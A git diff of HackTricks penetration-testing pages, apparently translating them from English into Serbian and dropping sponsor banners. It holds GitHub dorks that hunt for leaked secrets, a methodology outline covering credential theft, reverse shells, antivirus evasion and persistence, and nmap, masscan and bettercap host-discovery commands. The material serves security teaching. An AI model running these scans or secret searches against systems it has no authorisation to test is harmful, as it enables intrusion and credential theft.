@@ -28,7 +25,6 @@ Now that we have built the list of assets of our scope it's time to search for s
 - [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
 
 ### **Dorks**
-
 ```bash
 ".mlab.com password"
 "access_key"
@@ -310,5 +306,4 @@ GCP SECRET
 AWS SECRET
 "private" extension:pgp
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md
index 55186e1f3..19ca7bb4f 100644
--- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md
+++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md
@@ -2,17 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms.
+Cilj ove stranice je da nabroji **platforme koje omogućavaju pretragu koda** (literalno ili regex) u hiljadama/milionima repozitorijuma na jednoj ili više platformi.
 
-This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns.
+Ovo pomaže u nekoliko slučajeva da **pronađete provale informacija** ili **uzorke ranjivosti**.
 
-- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes.
-- [**Github Search**](https://github.com/search): Search across Github. It supports regexes.
-  - Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).
-- [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Search across Gitlab projects. Support regexes.
-- [**SearchCode**](https://searchcode.com/): Search code in millions of projects.
+- [**SourceGraph**](https://sourcegraph.com/search): Pretražujte u milionima repozitorijuma. Postoji besplatna verzija i verzija za preduzeća (sa 15 dana besplatno). Podržava regex.
+- [**Github Search**](https://github.com/search): Pretražujte po Github-u. Podržava regex.
+- Možda je takođe korisno proveriti i [**Github Code Search**](https://cs.github.com/).
+- [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Pretražujte po Gitlab projektima. Podržava regex.
+- [**SearchCode**](https://searchcode.com/): Pretražujte kod u milionima projekata.
 
 > [!WARNING]
-> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
+> Kada tražite provale u repozitorijumu i pokrenete nešto poput `git log -p`, ne zaboravite da mogu postojati **druge grane sa drugim commit-ima** koje sadrže tajne!
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-methodology.md b/src/generic-methodologies-and-resources/pentesting-methodology.md
index ea6b7f6a7..42595efd5 100644
--- a/src/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/src/generic-methodologies-and-resources/pentesting-methodology.md
@@ -1,146 +1,134 @@
-# Pentesting Methodology
+# Pentesting Metodologija
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
-## Pentesting Methodology
+## Pentesting Metodologija
 
 

 
-_Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
+_Hacktricks logotipi dizajnirani od_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
 
-### 0- Physical Attacks
+### 0- Fizički napadi
 
-Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications.md).
+Da li imate **fizički pristup** mašini koju želite da napadnete? Trebalo bi da pročitate neke [**trikove o fizičkim napadima**](../hardware-physical-access/physical-attacks.md) i druge o [**bežanju iz GUI aplikacija**](../hardware-physical-access/escaping-from-gui-applications.md).
 
-### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
+### 1 - [Otkriće hostova unutar mreže](pentesting-network/#discovering-hosts)/ [Otkriće imovine kompanije](external-recon-methodology/)
 
-**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
+**U zavisnosti** od toga da li je **test** koji sprovodite **interni ili eksterni test**, možda ćete biti zainteresovani za pronalaženje **hostova unutar mreže kompanije** (interni test) ili **pronalaženje imovine kompanije na internetu** (eksterni test).
 
 > [!NOTE]
-> Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide.
+> Imajte na umu da ako sprovodite eksterni test, kada uspete da dobijete pristup unutrašnjoj mreži kompanije, trebali biste ponovo započeti ovaj vodič.
 
-### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)**
+### **2-** [**Zabavljanje sa mrežom**](pentesting-network/) **(Interni)**
 
-**This section only applies if you are performing an internal test.**\
-Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing).
+**Ova sekcija se primenjuje samo ako sprovodite interni test.**\
+Pre nego što napadnete host, možda biste želeli da **ukradete neke akreditive** **sa mreže** ili **snifujete** neke **podatke** kako biste pasivno/aktivno (MitM) saznali šta možete pronaći unutar mreže. Možete pročitati [**Pentesting Mrežu**](pentesting-network/#sniffing).
 
-### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts)
+### 3- [Port skeniranje - Otkriće usluga](pentesting-network/#scanning-hosts)
 
-The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts).
+Prva stvar koju treba uraditi kada **tražite ranjivosti na hostu** je da znate koje **usluge rade** na kojim portovima. Pogledajmo [**osnovne alate za skeniranje portova hostova**](pentesting-network/#scanning-hosts).
 
-### **4-** [Searching service version exploits](../generic-hacking/search-exploits.md)
+### **4-** [Pretraživanje eksploita verzija usluga](../generic-hacking/search-exploits.md)
 
-Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell...
+Kada znate koje usluge rade, i možda njihovu verziju, morate **tražiti poznate ranjivosti**. Možda ćete imati sreće i postoji exploit koji će vam dati shell...
 
-### **5-** Pentesting Services
+### **5-** Pentesting Usluge
 
-If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.**
+Ako ne postoji neki fancy exploit za bilo koju aktivnu uslugu, trebali biste potražiti **uobičajene greške u konfiguraciji svake aktivne usluge.**
 
-**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports).
+**Unutar ove knjige naći ćete vodič za pentestovanje najčešćih usluga** (i drugih koje nisu tako uobičajene)**. Molimo vas da potražite u levom indeksu** _**PENTESTING**_ **sekciju** (usluge su poređane po njihovim podrazumevanim portovima).
 
-**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\
-Also, a small guide on how to[ **find known vulnerabilities in software**](../generic-hacking/search-exploits.md) can be found here.
+**Želim da napravim posebnu napomenu o** [**Pentestingu Web**](../network-services-pentesting/pentesting-web/) **delu (jer je to najopsežniji deo).**\
+Takođe, mali vodič o tome kako [**pronaći poznate ranjivosti u softveru**](../generic-hacking/search-exploits.md) može se naći ovde.
 
-**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any).
+**Ako vaša usluga nije u indeksu, potražite na Google-u** za druge tutorijale i **javite mi ako želite da je dodam.** Ako **ne možete ništa pronaći** na Google-u, izvršite svoj **vlastiti slepi pentesting**, možete početi tako što ćete **povezati se na uslugu, fuzzovati je i čitati odgovore** (ako ih ima).
 
-#### 5.1 Automatic Tools
+#### 5.1 Automatski alati
 
-There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.**
+Postoji nekoliko alata koji mogu izvršiti **automatske procene ranjivosti**. **Preporučio bih vam da probate** [**Legion**](https://github.com/carlospolop/legion)**, koji je alat koji sam kreirao i zasniva se na beleškama o pentestovanju usluga koje možete pronaći u ovoj knjizi.**
 
-#### **5.2 Brute-Forcing services**
+#### **5.2 Brute-Forcing usluga**
 
-In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](../generic-hacking/brute-force.md)**.**
+U nekim scenarijima **Brute-Force** može biti koristan za **kompromitovanje** **usluge**. [**Pronađite ovde CheatSheet različitih usluga brute forcing**](../generic-hacking/brute-force.md)**.**
 
 ### 6- [Phishing](phishing-methodology/)
 
-If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/):
+Ako do ovog trenutka niste pronašli nijednu zanimljivu ranjivost, **možda ćete morati da probate neki phishing** kako biste ušli u mrežu. Možete pročitati moju phishing metodologiju [ovde](phishing-methodology/):
 
-### **7-** [**Getting Shell**](../generic-hacking/reverse-shells/)
+### **7-** [**Dobijanje Shell-a**](../generic-hacking/reverse-shells/)
 
-Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](../generic-hacking/reverse-shells/).
+Na neki način biste trebali pronaći **neki način da izvršite kod** na žrtvi. Tada bi [lista mogućih alata unutar sistema koje možete koristiti za dobijanje reverznog shell-a bila veoma korisna](../generic-hacking/reverse-shells/).
 
-Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\
+Posebno na Windows-u mogli biste trebati neku pomoć da **izbegnete antiviruse**: [**Proverite ovu stranicu**](../windows-hardening/av-bypass.md)**.**\\
 
-### 8- Inside
+### 8- Unutra
 
-If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:
+Ako imate problema sa shell-om, ovde možete pronaći malu **kompilaciju najkorisnijih komandi** za pentestere:
 
 - [**Linux**](../linux-hardening/useful-linux-commands.md)
 - [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
 - [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
 
-### **9 -** [**Exfiltration**](../generic-hacking/exfiltration.md)
+### **9 -** [**Ekstrakcija**](../generic-hacking/exfiltration.md)
 
-You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](../generic-hacking/exfiltration.md)**.**
+Verovatno ćete morati da **izvučete neke podatke iz žrtve** ili čak **uvedete nešto** (kao što su skripte za eskalaciju privilegija). **Ovde imate** [**post o uobičajenim alatima koje možete koristiti u te svrhe**](../generic-hacking/exfiltration.md)**.**
 
-### **10- Privilege Escalation**
+### **10- Eskalacija privilegija**
 
-#### **10.1- Local Privesc**
+#### **10.1- Lokalna Privesc**
 
-If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
-Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
-You should also check this pages about how does **Windows work**:
+Ako niste **root/Administrator** unutar mašine, trebali biste pronaći način da **escalirate privilegije.**\
+Ovde možete pronaći **vodič za eskalaciju privilegija lokalno u** [**Linux-u**](../linux-hardening/privilege-escalation/) **i u** [**Windows-u**](../windows-hardening/windows-local-privilege-escalation/)**.**\
+Trebalo bi takođe da proverite ove stranice o tome kako **Windows funkcioniše**:
 
-- [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
-- How does [**NTLM works**](../windows-hardening/ntlm/)
-- How to [**steal credentials**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows
-- Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
+- [**Autentifikacija, Akreditivi, Token privilegije i UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
+- Kako funkcioniše [**NTLM**](../windows-hardening/ntlm/)
+- Kako [**ukrasti akreditive**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) u Windows-u
+- Neki trikovi o [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
 
-**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
+**Ne zaboravite da proverite najbolje alate za enumeraciju Windows i Linux lokalnih putanja eskalacije privilegija:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
 
 #### **10.2- Domain Privesc**
 
-Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
+Ovde možete pronaći [**metodologiju koja objašnjava najčešće akcije za enumeraciju, eskalaciju privilegija i persistenciju na Active Directory**](../windows-hardening/active-directory-methodology/). Čak i ako je ovo samo podsekcija jedne sekcije, ovaj proces može biti **izuzetno delikatan** na Pentesting/Red Team zadatku.
 
 ### 11 - POST
 
-#### **11**.1 - Looting
+#### **11**.1 - Pljačka
 
-Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
-Find here different ways to [**dump passwords in Windows**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md).
+Proverite da li možete pronaći više **lozinki** unutar hosta ili ako imate **pristup drugim mašinama** sa **privilegijama** vašeg **korisnika**.\
+Pronađite ovde različite načine za [**dumpovanje lozinki u Windows-u**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md).
 
-#### 11.2 - Persistence
+#### 11.2 - Persistencija
 
-**Use 2 or 3 different types of persistence mechanism so you won't need to exploit the system again.**\
-**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
+**Koristite 2 ili 3 različita tipa mehanizama persistencije kako ne biste morali ponovo da eksploatišete sistem.**\
+**Ovde možete pronaći neke** [**trikove za persistenciju na Active Directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
 
-TODO: Complete persistence Post in Windows & Linux
+TODO: Završiti persistenciju Post u Windows-u i Linux-u
 
 ### 12 - Pivoting
 
-With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
-In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](../generic-hacking/tunneling-and-port-forwarding.md).\
-You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
-Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
+Sa **prikupljenim akreditivima** mogli biste imati pristup drugim mašinama, ili možda trebate **otkriti i skenirati nove hostove** (ponovo započeti Pentesting Metodologiju) unutar novih mreža na kojima je vaša žrtva povezana.\
+U ovom slučaju tunelovanje bi moglo biti neophodno. Ovde možete pronaći [**post o tunelovanju**](../generic-hacking/tunneling-and-port-forwarding.md).\
+Definitivno biste takođe trebali proveriti post o [metodologiji pentestovanja Active Directory](../windows-hardening/active-directory-methodology/). Tamo ćete pronaći sjajne trikove za lateralno kretanje, eskalaciju privilegija i dumpovanje akreditiva.\
+Proverite takođe stranicu o [**NTLM**](../windows-hardening/ntlm/), može biti veoma korisna za pivotovanje u Windows okruženjima.
 
-### MORE
+### VIŠE
 
-#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
+#### [Android Aplikacije](../mobile-pentesting/android-app-pentesting/)
 
-#### **Exploiting**
+#### **Eksploatacija**
 
-- [**Basic Linux Exploiting**](broken-reference/)
-- [**Basic Windows Exploiting**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
-- [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
+- [**Osnovna Linux Eksploatacija**](broken-reference/)
+- [**Osnovna Windows Eksploatacija**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
+- [**Osnovni alati za eksploataciju**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
 
-#### [**Basic Python**](python/)
+#### [**Osnovni Python**](python/)
 
-#### **Crypto tricks**
+#### **Crypto trikovi**
 
 - [**ECB**](../crypto-and-stego/electronic-code-book-ecb.md)
 - [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
 - [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
 
-

-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md
index 1f4bb741f..fc60ec606 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/README.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/README.md
@@ -2,83 +2,69 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-\
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
-## Discovering hosts from the outside
+## Otkriće hostova sa spoljašnje strane
 
-This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.\
-In this situation you have some **scope of IPs** (maybe even several **ranges**) and you just to find **which IPs are responding**.
+Ovo će biti **kratka sekcija** o tome kako pronaći **IP adrese koje odgovaraju** sa **Interneta**.\
+U ovoj situaciji imate neki **opseg IP adresa** (možda čak i nekoliko **raspona**) i samo treba da pronađete **koje IP adrese odgovaraju**.
 
 ### ICMP
 
-This is the **easiest** and **fastest** way to discover if a host is up or not.\
-You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.\
-You could also use **nmap** to send other types of ICMP packets (this will avoid filters to common ICMP echo request-response).
-
+Ovo je **najlakši** i **najbrži** način da otkrijete da li je host aktivan ili ne.\
+Možete pokušati da pošaljete neke **ICMP** pakete i **očekujete odgovore**. Najlakši način je jednostavno slanje **echo zahteva** i očekivanje odgovora. To možete uraditi koristeći jednostavan `ping` ili koristeći `fping` za **raspone**.\
+Takođe možete koristiti **nmap** da pošaljete druge tipove ICMP paketa (to će izbeći filtere za uobičajene ICMP echo zahtev-odgovor).
 ```bash
 ping -c 1 199.66.11.4    # 1 echo request to a host
 fping -g 199.66.11.0/24  # Send echo requests to ranges
 nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
 ```
-
 ### TCP Port Discovery
 
-It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.\
-Then, what you need is a **fast port scanner** ([masscan](https://github.com/robertdavidgraham/masscan)) and a list of the **ports more used:**
-
+Veoma je uobičajeno da se svi tipovi ICMP paketa filtriraju. Tada, sve što možete da uradite da proverite da li je host aktivan je **pokušati da pronađete otvorene portove**. Svaki host ima **65535 portova**, tako da, ako imate "veliki" opseg, **ne možete** testirati da li je **svaki port** svakog hosta otvoren ili ne, to će potrajati previše vremena.\
+Tada, ono što vam je potrebno je **brzi skener portova** ([masscan](https://github.com/robertdavidgraham/masscan)) i lista **najčešće korišćenih portova:**
 ```bash
 #Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
 masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
 ```
-
-You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up.
+Možete takođe izvršiti ovaj korak sa `nmap`, ali je sporije i `nmap` ima problema sa identifikovanjem aktivnih hostova.
 
 ### HTTP Port Discovery
 
-This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**:
-
+Ovo je samo otkrivanje TCP portova korisno kada želite da **se fokusirate na otkrivanje HTTP** **usluga**:
 ```bash
 masscan -p80,443,8000-8100,8443 199.66.11.0/24
 ```
+### Otkriće UDP Portova
 
-### UDP Port Discovery
-
-You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number:
-
+Možete takođe pokušati da proverite da li je neki **UDP port otvoren** kako biste odlučili da li treba da **obratite više pažnje** na **host.** Pošto UDP usluge obično **ne odgovaraju** sa **bilo kojim podacima** na običan prazan UDP probni paket, teško je reći da li je port filtriran ili otvoren. Najlakši način da to odlučite je da pošaljete paket vezan za aktivnu uslugu, a pošto ne znate koja usluga radi, trebali biste probati najverovatniju na osnovu broja porta:
 ```bash
 nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
 # The -sV will make nmap test each possible known UDP service packet
 # The "--version-intensity 0" will make nmap only test the most probable
 ```
-
-The nmap line proposed before will test the **top 1000 UDP ports** in every host inside the **/24** range but even only this will take **>20min**. If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** (for a /24 range this will just take 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._
+Predložena nmap linija će testirati **top 1000 UDP portova** na svakom hostu unutar **/24** opsega, ali čak i to će trajati **>20min**. Ako su potrebni **najbrži rezultati**, možete koristiti [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24`. Ovo će poslati ove **UDP probe** na njihov **očekivani port** (za /24 opseg ovo će trajati samo 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._
 
 ### SCTP Port Discovery
-
 ```bash
 #Probably useless, but it's pretty fast, why not try it?
 nmap -T4 -sY -n --open -Pn 
 ```
-
 ## Pentesting Wifi
 
-Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:
+Ovde možete pronaći dobar vodič o svim poznatim Wifi napadima u vreme pisanja:
 
 {{#ref}}
 ../pentesting-wifi/
 {{#endref}}
 
-## Discovering hosts from the inside
+## Otkriće hostova iznutra
 
-If you are inside the network one of the first things you will want to do is to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed:
+Ako ste unutar mreže, jedna od prvih stvari koje ćete želeti da uradite je da **otkrijete druge hostove**. U zavisnosti od **koliko buke** možete/želite da napravite, različite akcije se mogu izvesti:
 
-### Passive
-
-You can use these tools to passively discover hosts inside a connected network:
+### Pasivno
 
+Možete koristiti ove alate za pasivno otkrivanje hostova unutar povezane mreže:
 ```bash
 netdiscover -p
 p0f -i eth0 -p -o /tmp/p0f.log
@@ -87,12 +73,10 @@ net.recon on/off #Read local ARP cache periodically
 net.show
 set net.show.meta true #more info
 ```
+### Aktivno
 
-### Active
-
-Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\
-But, as you are in the **same network** as the other hosts, you can do **more things**:
-
+Napomena da se tehnike komentarisane u [_**Otkrivanju hostova sa spolja**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP otkrivanje portova_) takođe mogu **primeniti ovde**.\
+Ali, pošto ste u **isto mreži** kao i ostali hostovi, možete raditi **više stvari**:
 ```bash
 #ARP discovery
 nmap -sn  #ARP Requests (Discover IPs)
@@ -112,39 +96,35 @@ set net.probe.throttle 10 #10ms between probes sent (default=10)
 #IPv6
 alive6  # Send a pingv6 to multicast.
 ```
-
 ### Active ICMP
 
-Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\
-But, as you are in the **same network** as the other hosts, you can do **more things**:
+Napomena da se tehnike komentarisane u _Otkrivanju hostova sa spolja_ ([_**ICMP**_](./#icmp)) takođe mogu **primeniti ovde**.\
+Ali, pošto ste u **istoј mreži** kao i ostali hostovi, možete uraditi **više stvari**:
 
-- If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255`
-- Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255`
-- Use the `-PE`, `-PP`, `-PM` flags of `nmap`to perform host discovery sending respectively **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24`
+- Ako **pingujete** **adresu za emitovanje podmreže**, ping bi trebao da stigne do **svakog hosta** i oni bi mogli da **odgovore** **vama**: `ping -b 10.10.5.255`
+- Pingovanjem **adresu za emitovanje mreže** mogli biste čak pronaći hostove unutar **drugih podmreža**: `ping -b 255.255.255.255`
+- Koristite `-PE`, `-PP`, `-PM` zastavice `nmap` za otkrivanje hostova slanjem **ICMPv4 echo**, **vremenskih oznaka**, i **zahteva za masku podmreže:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24`
 
 ### **Wake On Lan**
 
-Wake On Lan is used to **turn on** computers through a **network message**. The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.\
-Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.\
-If **no \[MAC]** is provided, the packet is sent to **broadcast ethernet** (and the broadcast MAC will be the one being repeated).
-
+Wake On Lan se koristi za **uključivanje** računara putem **mrežne poruke**. Magični paket koji se koristi za uključivanje računara je samo paket u kojem je **MAC Dst** naveden, a zatim se **ponavlja 16 puta** unutar istog paketa.\
+Ove vrste paketa se obično šalju u **ethernet 0x0842** ili u **UDP paket na port 9**.\
+Ako **nema \[MAC]** naveden, paket se šalje na **emitovanje ethernet** (a emitovani MAC će biti onaj koji se ponavlja).
 ```bash
 # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
 wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
 wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
 ```
+## Skenerisanje hostova
 
-## Scanning Hosts
-
-Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed.
+Kada otkrijete sve IP adrese (spoljašnje ili unutrašnje) koje želite detaljno skenirati, mogu se izvršiti različite radnje.
 
 ### TCP
 
-- **Open** port: _SYN --> SYN/ACK --> RST_
-- **Closed** port: _SYN --> RST/ACK_
-- **Filtered** port: _SYN --> \[NO RESPONSE]_
-- **Filtered** port: _SYN --> ICMP message_
-
+- **Otvoren** port: _SYN --> SYN/ACK --> RST_
+- **Zatvoren** port: _SYN --> RST/ACK_
+- **Filtriran** port: _SYN --> \[NEMA ODGOVORA]_
+- **Filtriran** port: _SYN --> ICMP poruka_
 ```bash
 # Nmap fast scan for the most 1000tcp ports used
 nmap -sV -sC -O -T4 -n -Pn -oA fastscan 
@@ -156,16 +136,14 @@ nmap -sV -sC -O -p- -n -Pn -oA fullscan 
 #Bettercap Scan
 syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
 ```
-
 ### UDP
 
-There are 2 options to scan an UDP port:
+Postoje 2 opcije za skeniranje UDP porta:
 
-- Send a **UDP packet** and check for the response _**ICMP unreachable**_ if the port is **closed** (in several cases ICMP will be **filtered** so you won't receive any information inf the port is close or open).
-- Send a **formatted datagrams** to elicit a response from a **service** (e.g., DNS, DHCP, TFTP, and others, as listed in _nmap-payloads_). If you receive a **response**, then, the port is **open**.
-
-**Nmap** will **mix both** options using "-sV" (UDP scans are very slow), but notice that UDP scans are slower than TCP scans:
+- Pošaljite **UDP paket** i proverite odgovor _**ICMP unreachable**_ ako je port **zatvoren** (u nekoliko slučajeva ICMP će biti **filtriran** pa nećete dobiti nikakve informacije ako je port zatvoren ili otvoren).
+- Pošaljite **formatirane datagrame** da izazovete odgovor od **usluge** (npr., DNS, DHCP, TFTP i druge, kako je navedeno u _nmap-payloads_). Ako dobijete **odgovor**, tada je port **otvoren**.
 
+**Nmap** će **kombinovati obe** opcije koristeći "-sV" (UDP skeniranja su veoma spora), ali imajte na umu da su UDP skeniranja sporija od TCP skeniranja:
 ```bash
 # Check if any of the most common udp services is running
 udp-proto-scanner.pl 
@@ -177,38 +155,34 @@ nmap -sU -sV -sC -n -F -T4 
 nmap -sU -sV --version-intensity 0 -n -T4 
 # You could use nmap to test all the UDP ports, but that will take a lot of time
 ```
-
 ### SCTP Scan
 
-**SCTP (Stream Control Transmission Protocol)** is designed to be used alongside **TCP (Transmission Control Protocol)** and **UDP (User Datagram Protocol)**. Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in **Signaling System 7 (SS7)**. **SCTP** is a core component of the **SIGTRAN** protocol family, which aims to transport SS7 signals over IP networks.
